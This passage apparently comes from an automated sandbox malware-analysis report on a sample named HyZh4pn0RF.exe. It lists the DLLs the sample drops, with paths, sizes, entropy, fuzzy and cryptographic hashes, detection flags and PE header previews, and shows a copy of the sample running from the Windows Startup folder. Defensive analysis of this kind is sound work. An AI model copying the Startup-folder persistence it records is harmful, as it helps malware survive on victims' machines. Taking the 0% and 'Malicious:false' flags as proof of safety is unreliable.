                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:bA3W6Fck6/g5DzNa4cMy/dzpd1dhdMdJGFEr6/vD:MW6NzcMy/d13FErgvD
                                                                                                                                                                                                                                                                                                MD5:BF9A9DA1CF3C98346002648C3EAE6DCF
                                                                                                                                                                                                                                                                                                SHA1:DB16C09FDC1722631A7A9C465BFE173D94EB5D8B
                                                                                                                                                                                                                                                                                                SHA-256:4107B1D6F11D842074A9F21323290BBE97E8EED4AA778FBC348EE09CC4FA4637
                                                                                                                                                                                                                                                                                                SHA-512:7371407D12E632FC8FB031393838D36E6A1FE1E978CED36FF750D84E183CDE6DD20F75074F4597742C9F8D6F87AF12794C589D596A81B920C6C62EE2BA2E5654
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..r...r...r......r...s...r...s...r...w...r...v..r...q...r.#.s...r...s...r..8z...r..8r...r..8....r..8p...r.Rich..r.........................PE..d....jAe.........." ...%.:...........<.......................................0............`.........................................@...d.......................(............ ......P...................................@............P...............................text....8.......:.................. ..`.rdata...W...P...X...>..............@..@.data...8=.......0..................@....pdata..(...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):5191960
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.962142634441191
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:98304:n3+pefu6fSar+SJ8aqfPomg1CPwDvt3uFlDCE:3G+u6fb+SJ8aqfwmg1CPwDvt3uFlDCE
                                                                                                                                                                                                                                                                                                MD5:E547CF6D296A88F5B1C352C116DF7C0C
                                                                                                                                                                                                                                                                                                SHA1:CAFA14E0367F7C13AD140FD556F10F320A039783
                                                                                                                                                                                                                                                                                                SHA-256:05FE080EAB7FC535C51E10C1BD76A2F3E6217F9C91A25034774588881C3F99DE
                                                                                                                                                                                                                                                                                                SHA-512:9F42EDF04C7AF350A00FA4FDF92B8E2E6F47AB9D2D41491985B20CD0ADDE4F694253399F6A88F4BDD765C4F49792F25FB01E84EC03FD5D0BE8BB61773D77D74D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%..7..4......v.........................................O.......P...`.........................................P.H.0....kN.@.....N.|.....K.d.....O../....N....P.C.8.............................C.@............`N..............................text.....7.......7................. ..`.rdata....... 7.......7.............@..@.data....n....K..<....J.............@....pdata..0.....K......4K.............@..@.idata...%...`N..&....N.............@..@.00cfg..u.....N.......N.............@..@.rsrc...|.....N......0N.............@..@.reloc........N......8N.............@..B................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):39696
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                                                                                MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                                                                                SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                                                                                SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                                                                                SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):787224
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.609561366841894
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:ytPc2nnGoNg4kSHoxX09yO5EavUFe9Xb12:y9jnnpTHoxXUsFe9XbM
                                                                                                                                                                                                                                                                                                MD5:19A2ABA25456181D5FB572D88AC0E73E
                                                                                                                                                                                                                                                                                                SHA1:656CA8CDFC9C3A6379536E2027E93408851483DB
                                                                                                                                                                                                                                                                                                SHA-256:2E9FBCD8F7FDC13A5179533239811456554F2B3AA2FB10E1B17BE0DF81C79006
                                                                                                                                                                                                                                                                                                SHA-512:DF17DC8A882363A6C5A1B78BA3CF448437D1118CCC4A6275CC7681551B13C1A4E0F94E30FFB94C3530B688B62BFF1C03E57C2C185A7DF2BF3E5737A06E114337
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.*..........K........................................ ............`..........................................g...Q..............s.......@M......./......`.......8...........................`...@............p...............................text...D).......*.................. ..`.rdata..Hy...@...z..................@..@.data....N.......H..................@....pdata...V.......X..................@..@.idata...c...p...d...H..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..4...........................@..B........................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):199448
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.385263095268062
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:gP9/HQAYp/8IdzL37lqrEJesY7p7Ndrjt8HWcFwUT6ZIALhNn6:opFYp/vdzL3pqrEJ2xDrJ8DdT6A
                                                                                                                                                                                                                                                                                                MD5:F179C9BDD86A2A218A5BF9F0F1CF6CD9
                                                                                                                                                                                                                                                                                                SHA1:4544FB23D56CC76338E7F71F12F58C5FE89D0D76
                                                                                                                                                                                                                                                                                                SHA-256:C42874E2CF034FB5034F0BE35F7592B8A96E8903218DA42E6650C504A85B37CC
                                                                                                                                                                                                                                                                                                SHA-512:3464ECE5C6A0E95EF6136897B70A96C69E552D28BFEDD266F13EEC840E36EC2286A1FB8973B212317DE6FE3E93D7D7CC782EB6FC3D6A2A8F006B34F6443498DE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W,.6B..6B..6B..N..6B..IC..6B..IG..6B..IF..6B..IA..6B...C..6B..NC..6B..6C..6B...O..6B...B..6B......6B...@..6B.Rich.6B.........PE..d......e.........." ...%.............................................................)....`......................................... ...P...p............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata..D.... ......................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):7009048
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.7826778751744685
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:49152:mz0oCxOqKWneF3o1VLCClOTNRpaOviXEYWyb3eOYTvuFsx/iac84YNFXiTlv5WF4:mooCcqKLHX+az2Ro8Kv7HDMiEB/
                                                                                                                                                                                                                                                                                                MD5:550288A078DFFC3430C08DA888E70810
                                                                                                                                                                                                                                                                                                SHA1:01B1D31F37FB3FD81D893CC5E4A258E976F5884F
                                                                                                                                                                                                                                                                                                SHA-256:789A42AC160CEF98F8925CB347473EEEB4E70F5513242E7FABA5139BA06EDF2D
                                                                                                                                                                                                                                                                                                SHA-512:7244432FC3716F7EF27630D4E8FBC8180A2542AA97A01D44DCA260AB43966DD8AC98B6023400B0478A4809AACE1A128F1F4D6E544F2E591A5B436FD4C8A9D723
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T..e...e...e...d...e.......e...`...e...a...e...f...e.......e..d...e...d...e..Bh.M.e..Be...e..B....e..Bg...e.Rich..e.........................PE..d......e.........." ...%.$)..ZB......]........................................k.....:.k...`...........................................O.d...toP......Pj.......`.dZ....j../...`j.pZ....3.T.....................I.(...P.3.@............@)..............................text....")......$)................. ..`.rdata...T'..@)..V'..().............@..@.data....?....P......~P.............@....pdata..dZ....`..\....`.............@..@PyRuntim.....@c......\b.............@....rsrc........Pj......^i.............@..@.reloc..pZ...`j..\...hi.............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):134656
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.9953900911096785
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:Yuh2G0a2fYrFceQaVK756Y/r06trvoEKQAe7KL8KJKVKGajt4:Yuh2faiYrFceQaVfY/rxTBAe7KwKwVrE
                                                                                                                                                                                                                                                                                                MD5:26D752C8896B324FFD12827A5E4B2808
                                                                                                                                                                                                                                                                                                SHA1:447979FA03F78CB7210A4E4BA365085AB2F42C22
                                                                                                                                                                                                                                                                                                SHA-256:BD33548DBDBB178873BE92901B282BAD9C6817E3EAC154CA50A666D5753FD7EC
                                                                                                                                                                                                                                                                                                SHA-512:99C87AB9920E79A03169B29A2F838D568CA4D4056B54A67BC51CAF5C0FF5A4897ED02533BA504F884C6F983EBC400743E6AD52AC451821385B1E25C3B1EBCEE0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.$g..wg..wg..wn.[wk..w5..vc..w..5wf..w5..vs..w5..vo..w5..vd..ws..vf..w...ve..ws..vl..wg..w...w...vj..w...vf..w...vf..wRichg..w........PE..d......d.........." ................L........................................P............`......................................... u..`B......,....0..l.......L............@..0...`Q..T............................Q..8............................................text............................... ..`.rdata..R...........................@..@.data....-.......(..................@....pdata..L...........................@..@.rsrc...l....0......................@..@.reloc..0....@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):30488
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.582548725691534
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:b9yLTFInPLnIdHqp3DT90IZIAQGyHQIYiSy1pCQ273bAM+o/8E9VF0Nypyn4:6inzUHqN1rZIAQGo5YiSyvUrAMxkEjh
                                                                                                                                                                                                                                                                                                MD5:8A273F518973801F3C63D92AD726EC03
                                                                                                                                                                                                                                                                                                SHA1:069FC26B9BD0F6EA3F9B3821AD7C812FD94B021F
                                                                                                                                                                                                                                                                                                SHA-256:AF358285A7450DE6E2E5E7FF074F964D6A257FB41D9EB750146E03C7DDA503CA
                                                                                                                                                                                                                                                                                                SHA-512:7FEDAE0573ECB3946EDE7D0B809A98ACAD3D4C95D6C531A40E51A31BDB035BADC9F416D8AAA26463784FF2C5E7A0CC2C793D62B5FDB2B8E9FAD357F93D3A65F8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..t.s.'.s.'.s.'..7'.s.'...&.s.'...&.s.'...&.s.'...&.s.'(.&.s.'.s.'Ps.'Y..&.s.'(.&.s.'(.&.s.'(.['.s.'(.&.s.'Rich.s.'........PE..d......e.........." ...%.....2.......................................................y....`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1500440
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.588676275246953
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24576:iTqtyGkxOc+wv05tP5kf82Hr/74YPF5o/P/gnAracr7/24UcypY7w0vpZUFv++b:hk0jwv4tP5kf8ar/74EF2/An4acrVUcc
                                                                                                                                                                                                                                                                                                MD5:C1161C1CEC57C5FFF89D10B62A8E2C3A
                                                                                                                                                                                                                                                                                                SHA1:C4F5DEA84A295EC3FF10307A0EA3BA8D150BE235
                                                                                                                                                                                                                                                                                                SHA-256:D1FD3040ACDDF6551540C2BE6FF2E3738F7BD4DFD73F0E90A9400FF784DD15E6
                                                                                                                                                                                                                                                                                                SHA-512:D545A6DC30F1D343EDF193972833C4C69498DC4EA67278C996426E092834CB6D814CE98E1636C485F9B1C47AD5C68D6F432E304CD93CEED0E1E14FEAF39B104A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......SJ...+...+...+...S...+...T...+...T...+...T...+...T...+..\S...+...+...+..-....+..-....+..-.n..+..-....+..Rich.+..................PE..d......e.........." ...%............................................................M7....`..........................................d...".............................../..........P...T...............................@...............@............................text...x........................... ..`.rdata..f...........................@..@.data....G.......>..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1137944
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.462202215180296
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:hrEHdcM6hbFCjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfciFt:hrEXYCjfk7bPNfv42BN6yzUiFt
                                                                                                                                                                                                                                                                                                MD5:04F35D7EEC1F6B72BAB9DAF330FD0D6B
                                                                                                                                                                                                                                                                                                SHA1:ECF0C25BA7ADF7624109E2720F2B5930CD2DBA65
                                                                                                                                                                                                                                                                                                SHA-256:BE942308D99CC954931FE6F48ED8CC7A57891CCBE99AAE728121BCDA1FD929AB
                                                                                                                                                                                                                                                                                                SHA-512:3DA405E4C1371F4B265E744229DCC149491A112A2B7EA8E518D5945F8C259CAD15583F25592B35EC8A344E43007AE00DA9673822635EE734D32664F65C9C8D9B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........K..K..K..B.q.M..^..I..^..F..^..C..^..H..qE.H.....I..K.....qE.J..qE.J..qE..J..qE..J..RichK..........................PE..d......e.........." ...%.>..........`*.......................................p............`.........................................p...X............P.......@.........../...`......P^..T............................]..@............P..p............................text....=.......>.................. ..`.rdata..\....P.......B..............@..@.data...X.... ......................@....pdata.......@......................@..@.rsrc........P......."..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):133632
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.851293297484796
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:bPwB2zC1vwC3XetCf5RlRVFhLaNKPRyymoh5Lm9b0e:bIB2zkvwGXetCfDlRVlPRy85Lm9
                                                                                                                                                                                                                                                                                                MD5:3A80FEA23A007B42CEF8E375FC73AD40
                                                                                                                                                                                                                                                                                                SHA1:04319F7552EA968E2421C3936C3A9EE6F9CF30B2
                                                                                                                                                                                                                                                                                                SHA-256:B70D69D25204381F19378E1BB35CC2B8C8430AA80A983F8D0E8E837050BB06EF
                                                                                                                                                                                                                                                                                                SHA-512:A63BED03F05396B967858902E922B2FBFB4CF517712F91CFAA096FF0539CF300D6B9C659FFEE6BF11C28E79E23115FD6B9C0B1AA95DB1CBD4843487F060CCF40
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I^.f'..f'..f'......f'...&..f'...#..f'...$..f'.o.&..f'..."..f'...&..f'..f&..g'.o....f'.o.'..f'.o.%..f'.Rich.f'.................PE..d......d.........." .........................................................P............`..........................................................0..\....................@..$....v..T............................<..8............0..........@....................text...$........................... ..`.rdata......0......................@..@.data...x(......."..................@....pdata..............................@..@.rsrc...\....0......................@..@.reloc..$....@......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11264
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.703513333396807
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:nDzb9VD9daQ2iTrqT+6Zdp/Q0I1uLfcC75JiC4Rs89EcYyGDV90OcX6gY/7ECFV:Dzz9damqTrpYTst0E5DVPcqgY/79X
                                                                                                                                                                                                                                                                                                MD5:6176101B7C377A32C01AE3EDB7FD4DE6
                                                                                                                                                                                                                                                                                                SHA1:5F1CB443F9D677F313BEC07C5241AEAB57502F5E
                                                                                                                                                                                                                                                                                                SHA-256:EFEA361311923189ECBE3240111EFBA329752D30457E0DBE9628A82905CD4BDB
                                                                                                                                                                                                                                                                                                SHA-512:3E7373B71AE0834E96A99595CFEF2E96C0F5230429ADC0B5512F4089D1ED0D7F7F0E32A40584DFB13C41D257712A9C4E9722366F0A21B907798AE79D8CEDCF30
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13312
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.968452734961967
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:JF3TgNlF/1Nt5aSd4+1ijg0NLfFNJSCqsstXHTeH5ht47qMbxbfDqbwYH/kcX6gT:WF/1nb2mhQtkXHTeZ87VDqrMcqgYvEp
                                                                                                                                                                                                                                                                                                MD5:371776A7E26BAEB3F75C93A8364C9AE0
                                                                                                                                                                                                                                                                                                SHA1:BF60B2177171BA1C6B4351E6178529D4B082BDA9
                                                                                                                                                                                                                                                                                                SHA-256:15257E96D1CA8480B8CB98F4C79B6E365FE38A1BA9638FC8C9AB7FFEA79C4762
                                                                                                                                                                                                                                                                                                SHA-512:C23548FBCD1713C4D8348917FF2AB623C404FB0E9566AB93D147C62E06F51E63BDAA347F2D203FE4F046CE49943B38E3E9FA1433F6455C97379F2BC641AE7CE9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8......x9..d....`.......P..L............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..L....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13824
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.061461040216793
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:ldF/1nb2mhQtkXn0t/WS60YYDEiqvdvGyv9lkVcqgYvEMo:v2f6XSZ6XYD6vdvGyv9MgYvEMo
                                                                                                                                                                                                                                                                                                MD5:CB5238E2D4149636377F9A1E2AF6DC57
                                                                                                                                                                                                                                                                                                SHA1:038253BABC9E652BA4A20116886209E2BCCF35AC
                                                                                                                                                                                                                                                                                                SHA-256:A8D3BB9CD6A78EBDB4F18693E68B659080D08CB537F9630D279EC9F26772EFC7
                                                                                                                                                                                                                                                                                                SHA-512:B1E6AB509CF1E5ECC6A60455D6900A76514F8DF43F3ABC3B8D36AF59A3DF8A868B489ED0B145D0D799AAC8672CBF5827C503F383D3F38069ABF6056ECCD87B21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13824
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.236167046748013
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:/siHXqpoUol3xZhRyQX5lDnRDFYav+tcqgRvE:h6D+XBDgDgRvE
                                                                                                                                                                                                                                                                                                MD5:D9E7218460AEE693BEA07DA7C2B40177
                                                                                                                                                                                                                                                                                                SHA1:9264D749748D8C98D35B27BEFE6247DA23FF103D
                                                                                                                                                                                                                                                                                                SHA-256:38E423D3BCC32EE6730941B19B7D5D8872C0D30D3DD8F9AAE1442CB052C599AD
                                                                                                                                                                                                                                                                                                SHA-512:DDB579E2DEA9D266254C0D9E23038274D9AE33F0756419FD53EC6DC1A27D1540828EE8F4AD421A5CFFD9B805F1A68F26E70BDC1BAB69834E8ACD6D7BB7BDB0DB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K..*...*...*...R...*...U...*..R...*...*...*...U...*...U...*...U...*.....*.....*...}..*.....*..Rich.*..........................PE..d....e.........." ...%............P.....................................................`..........................................9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@.......,..............@....pdata..|....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):36352
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.558176937399355
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:Dz2P+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuCLg46:DzeqWB7YJlmLJ3oD/S4j990th9VCsC
                                                                                                                                                                                                                                                                                                MD5:F751792DF10CDEED391D361E82DAF596
                                                                                                                                                                                                                                                                                                SHA1:3440738AF3C88A4255506B55A673398838B4CEAC
                                                                                                                                                                                                                                                                                                SHA-256:9524D1DADCD2F2B0190C1B8EDE8E5199706F3D6C19D3FB005809ED4FEBF3E8B5
                                                                                                                                                                                                                                                                                                SHA-512:6159F245418AB7AD897B02F1AADF1079608E533B9C75006EFAF24717917EAA159846EE5DFC0E85C6CFF8810319EFECBA80C1D51D1F115F00EC1AFF253E312C00
